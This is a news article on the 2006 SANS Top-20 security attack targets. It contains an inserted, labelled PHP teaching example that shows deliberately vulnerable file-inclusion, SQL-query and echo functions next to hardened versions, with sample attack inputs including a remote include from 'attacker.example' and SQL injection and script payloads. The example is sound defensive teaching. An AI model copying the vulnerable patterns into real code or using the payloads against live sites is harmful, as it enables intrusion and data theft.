SANS hit list of security vulnerabilities - Windows out in front
The SANS (SysAdmin, Audit, Network, Security) Institute has once again published its security Top-20. As in the previous report, the list is devoted to the twenty most common attack targets and, in addition to Windows and Unix vulnerabilities, also covers applications and network services. For the first time the list contains a "Security Policy and Personnel" heading, which looks at the effect of users and organisational policy on security.
Windows remains, as in the previous year, the most popular target, helped along by the large number of zero-day vulnerabilities (publicly known vulnerabilities for which no patch is yet available). This year Internet Explorer, Windows libraries and Office in particular offered significant points of attack.
However, it is not always clear how SANS arrived at some of its other conclusions. Unix apparently appears on the list solely on the basis of possible configuration errors. A number of privilege escalation vulnerabilities in Linux, one of which was used, for example, to compromise a Debian development server, are not mentioned in the report. Mac OS X, by contrast, is listed as a fairly insecure operating system: SANS counts a total of 21 vulnerabilities for it in the CVE database, based on a number of flaws in Safari, ImageIO and other software.
Among cross-platform applications, web applications lead the field. Hardly a day goes by without a cross-site scripting or SQL injection vulnerability, or a remote file inclusion opportunity, being discovered in some PHP application. Client applications follow close behind. P2P and instant messaging clients have also grown into a major entry point for attackers and malware: attackers exploit buffer overflows in the client software, while worms and viruses take advantage of users' carelessness when exchanging files. Software intended to improve security is itself increasingly becoming part of the problem: vulnerabilities in anti-virus and backup software, spam filters, monitoring systems and directory services continue to present a high level of risk.
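The three PHP web-application flaws named above, remote file inclusion, SQL injection and cross-site scripting, all come from the same mistake: request data is spliced into a path, a query or a page without being constrained to what the code actually expects. The following is an added example written for this page, not code from the SANS report or from any of the applications it covers; every name in it (the `page`, `id` and `q` parameters, the `pages` directory, the `users` table, the PDO handle) is an assumption made up for the illustration. Each flaw is shown in its vulnerable form next to a hardened form.

```php
<?php
// Added example, not from the SANS report or this article. Names such as
// $page, $id, $q, the pages/ directory and the users table are assumptions.

// --- 1. Remote file inclusion ---------------------------------------------
// Vulnerable: with URL includes enabled (before PHP 5.2 this was governed by
// allow_url_fopen, which was on by default; 5.2 split out allow_url_include),
// ?page=http://attacker.example/shell.txt fetches and executes remote code.
// Even with URL includes off, ../ sequences reach arbitrary local files, and
// PHP versions that did not yet reject NUL bytes in paths could be made to
// drop the ".php" suffix with a trailing %00.
function vulnerable_include() {
    include($_GET['page'] . '.php');
}

// Hardened: never build a path from request data. Map the parameter onto a
// fixed allow-list of page names and refuse anything that is not on it.
function safe_include($page) {
    $allowed = array('home', 'about', 'contact');
    if (!in_array($page, $allowed, true)) {   // strict comparison: no type juggling
        header('HTTP/1.0 404 Not Found');
        return false;
    }
    include __DIR__ . '/pages/' . $page . '.php';
    return true;
}

// --- 2. SQL injection -----------------------------------------------------
// Vulnerable: ?id=1 OR 1=1 returns every row; ?id=1 UNION SELECT ... reads
// other tables, because the parameter becomes part of the SQL grammar.
function vulnerable_query($db, $id) {
    return $db->query("SELECT name FROM users WHERE id = " . $id);
}

// Hardened: a prepared statement sends the value separately from the query
// text, so it can never be parsed as SQL. Casting to int is an independent
// second check appropriate for a numeric key.
function safe_query(PDO $db, $id) {
    $stmt = $db->prepare('SELECT name FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- 3. Cross-site scripting ----------------------------------------------
// Vulnerable: ?q=<script>...</script> is reflected verbatim into the page and
// runs in the browser of anyone who follows a crafted link.
function vulnerable_echo($q) {
    echo "You searched for: " . $q;
}

// Hardened: encode for the HTML context at the point of output. ENT_QUOTES
// also covers attribute contexts; the explicit charset stops multi-byte
// sequences from slipping past the encoder.
function safe_echo($q) {
    echo "You searched for: " . htmlspecialchars($q, ENT_QUOTES, 'UTF-8');
}
```

The common thread in the hardened versions is that the request data never reaches the interpreter that would give it meaning: the include path is chosen from a list rather than built, the SQL value travels as a bound parameter rather than as query text, and the reflected string is encoded for the exact context it lands in.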
Voice over IP is increasingly becoming a target of attacks, made easier by, for example, vulnerabilities in Cisco's Unified Call Manager and the PBX software Asterisk. In its "Security Policy and Personnel" section, SANS examines the role played by policies and users. According to SANS, unauthorised devices on a network represent a considerable problem; this covers both external laptops plugged into the LAN and infected USB flash drives connected to company PCs. In addition, too many users have too many privileges on their PCs, which leads to uncontrolled growth in installed software and the security problems that follow from it. That SANS also identifies users as the target of phishing attacks should come as no surprise.
The SANS Top-20 is unlikely to be the revelation to many readers that it was a few years ago: the results of the numerous other reports and studies published by vendors and service providers are now too similar.
- SANS Top-20 Internet Security Attack Targets, report for 2006